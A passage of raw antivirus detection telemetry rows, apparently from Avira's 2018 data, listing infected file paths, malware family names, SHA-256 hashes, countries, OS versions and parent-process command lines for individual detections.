  Row(detection=Row(filename='svchost.exe', filepath='C:\\Documents and Settings\\X\\Dane aplikacji\\29899417\\svchost.exe', filesize=320000, name='HEUR/AGEN.1004092.#M1.#R1'), hash='1e2ac26940534dcd587aef71a1b70ff53cfc8714cd59431ee5687493869d916d', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:32:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205122-02bd3cae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_312b1817\\AVSCAN-20181104-205034-FC074942\\AVSCAN-20181104-205122-02BD3CAE', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:51:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151508-c9fca103', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_477a6136\\AVSCAN-20181104-151436-C6565797\\AVSCAN-20181104-151508-C9FCA103', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:15:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233619-6eda5d94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca0cc13b\\AVSCAN-20181104-233438-5C08BF96\\AVSCAN-20181104-233619-6EDA5D94', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:36:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='god.exe', filepath='F:\\digetal\\god\\god.exe', filesize=256000, name='W32/Drowor.#M0.#R0'), hash='b39c6fb8d2ae3356d52a251683c8efe4868bf6f882ca28d6153d60177c769842', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T08:55:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001400-50a6869c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b450994d\\AVSCAN-20181105-001328-4CD55D2F\\AVSCAN-20181105-001400-50A6869C', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:13:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212828-8ad5e4e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212828-8AD5E4E3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:28:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172517-419546d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09c4c8d8\\AVSCAN-20181104-172353-3554EA83\\AVSCAN-20181104-172517-419546D6', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:25:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000121e', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000121e', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imgtool.exe', filepath='D:\\العاب\\ASD.Apple.Grand.Theft. Auto.San.Andreas\\ASD.Apple.Grand.Theft. Auto.San.Andreas\\GtaViceCity\\gta زياد\\imgtool20\\IMGTool.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='14f04eace19df3ba8d1b15419f2a5e692bb278f532c264e1b59bb23b60b57611', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:KDC+9jmoeEGnhH1S.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T18:28:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115719-0929508d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_949c51c9\\AVSCAN-20181104-114243-D1379150\\AVSCAN-20181104-115719-0929508D', filesize=1336000, name='PUA/InstallCore.#M1.#R1'), hash='4ba0876fef0855708223e1ccd6ba78e35e0cb264716caf88703ab50aec1935bb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:57:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-004942-f71bd22c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0874acbe\\AVSCAN-20181105-004848-F02704B4\\AVSCAN-20181105-004942-F71BD22C', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:49:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111333-ca5c5037', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56777924\\AVSCAN-20181104-111320-C816040E\\AVSCAN-20181104-111333-CA5C5037', filesize=448000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='53b707ff616b7c1a8d13790af4d12051ca2e803626e9fcc93a09b13f35e370cb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:13:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~temp5083140.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~temp5083140.tmp', filesize=448000, name='PUA/LoadMoney.#M1.#R1'), hash='96ed3c7fa79bc55c24e85d367e8070bede957254753339120605f2356b0dc176', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:17:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename="instal·lar estudi de rehabilitació energètica d'edificis.exe", filepath="C:\\Users\\X\\Desktop\\Eze\\Eze\\Programas\\CYPE\\cypeCAD2014p\\Instal·lació en català\\Instal·lar programes solts\\Instal·lar Estudi de rehabilitació energètica d'edificis.exe", filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='c4bf227ff80a750625210b12f008c837110c44dfe855b29c2b3556e10abcc04d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:29:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2261919.exe', filepath='C:\\Program Files (x86)\\Super\\2261919.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202103-b20500d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-201807-925018B6\\AVSCAN-20181104-202103-B20500D0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:21:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flash_update.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:37:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000822', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp00000822', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:51:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rar password unlocker.exe', filepath='D:\\RAR Password Unlocker\\RAR Password Unlocker.exe', filesize=832000, name='W32/Sality.AT.#M1.#R1'), hash='80566586160d168489741925e92cb82c1261041f7ff17f0d2aeba3720cc129a8', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T08:41:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-094842-39adbfee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42352ddd\\AVSCAN-20181104-094440-1D967329\\AVSCAN-20181104-094842-39ADBFEE', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:48:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='luiswdlb.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LUIswdLb.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='comm3318.htm', filepath='\\\\SERVERPC\\MASTER SOFTWARE\\1. Crystal Reports 8.5\\ProgramF\\SEAGAT~1\\CRW\\Help\\En\\HTML\\COMM3318.htm', filesize=252000, name='W32/Chir.B.#M1.#R1'), hash='f5dc30222ab072dd5599da47bb7d03b36a1bf152294adcefb8e4f517e7883f03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SIMRS NEW\\SIMRS.exe', parentsize=15815676, timestamp='2018-11-02T01:35:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-02T18:30:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073009-86a90579', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-072100-4A04D9B8\\AVSCAN-20181102-073009-86A90579', filesize=152000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='cf87f251ce34e0268e60362a66397fd7e9637c6251afd58fdcc7102a9c6da09c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='enumdevlib.dll', filepath='C:\\Program Files\\REALTEK\\USB Wireless LAN Utility\\EnumDevLib.dll', filesize=24000, name='HEUR/AGEN.1015211.#M1.#R1'), hash='f798df3d95a202189d0f200479ec581fcc791ecf1b21701e024bd952fefaec55', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141248-40a85d98', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-141204-087D4FD4\\AVSCAN-20181102-141248-40A85D98', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:12:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='c0e32d2dc441de3cabc468efd9741547760517a85c76f9f04a4400f02c3cc3d9', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NICE\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:2kPxSQckmkSZhgpS.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:51:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\redkingsmpp\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redkingsmpp\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T21:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-035446-3cc888d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_275196ea\\AVSCAN-20181102-035145-215BA771\\AVSCAN-20181102-035446-3CC888D5', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline='\\\\\\"first_run\\\\\\" \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\BA4DAC13-8DFA-4EC9-BB5D-2C33A037EFFD\\\\\\\\installer_campaign_14922.exe\\\\\\"', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', parentsize=320000, timestamp='2018-11-02T14:22:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='procmon.exe', filepath='D:\\ex desktop\\hack\\regmon\\Procmon.exe', filesize=2552000, name='W32/Neshta.A.#M1.#R1'), hash='9edb637c4276cd2a5cff16cfb64dd53ec1c12bb79e30c2e2dcb29ae5136f972f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-02T19:03:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d6654e9beb6f6f15cc9fca358375e60af60eedce20c9e82578ffe4da23a27c1b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-24\\D6654E9BEB6F6F15CC9FCA358375E60AF60EEDCE20C9E82578FFE4DA23A27C1B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d6654e9beb6f6f15cc9fca358375e60af60eedce20c9e82578ffe4da23a27c1b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:00:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ohmmipdl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\oHMmiPdL.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winmgmt.exe', filepath='d:\\windows\\system32\\wbem\\WinMgmt.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8cd27bd744d913a4a5540c94adcbf5479eefe1bbb46d93d116209f946f78e84a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\192.168.0.100\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\經營管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='76a84b3f9652d21a1a93f6578a3fff9714c697e125c87d859e58e40858015ae2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jolt.exe', filepath='\\\\?\\C:\\Windows\\jolt.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181558-6ad54640', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dde6b91\\AVSCAN-20181102-175827-0F3232B0\\AVSCAN-20181102-181558-6AD54640', filesize=1280000, name='TR/Agent.anqai.#M1.#R1'), hash='bd25952768b6332da9a97a9234b8abe029fac840c7a5f025a8fc3937f543386b', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212550-60e2a80f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_19e2935b\\AVSCAN-20181102-212415-53B6D721\\AVSCAN-20181102-212550-60E2A80F', filesize=2496000, name='Adware/Wajam.deane.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e0482b3ec4d6f7ecafdde22c9c6672dea48b2f394caeb4bbe55e265c03b9f4be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\E0482B3EC4D6F7ECAFDDE22C9C6672DEA48B2F394CAEB4BBE55E265C03B9F4BE', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='e0482b3ec4d6f7ecafdde22c9c6672dea48b2f394caeb4bbe55e265c03b9f4be', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:07:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064514-35da3ca7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064514-35DA3CA7', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0yg3pndpr5x\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:32:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='e4174a525b5e10e5fb530b6aa34541f89d3faec763d225464f8b3e2799f678d9', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:42:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='creatures.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\as\\Creatures\\Creatures.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061256-44a9546f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-061256-44A9546F', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f5eb224602ed155c4334540af9b090135f9fab3cabfd5a5866599af469dde81b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\F5EB224602ED155C4334540AF9B090135F9FAB3CABFD5A5866599AF469DDE81B', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='f5eb224602ed155c4334540af9b090135f9fab3cabfd5a5866599af469dde81b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- 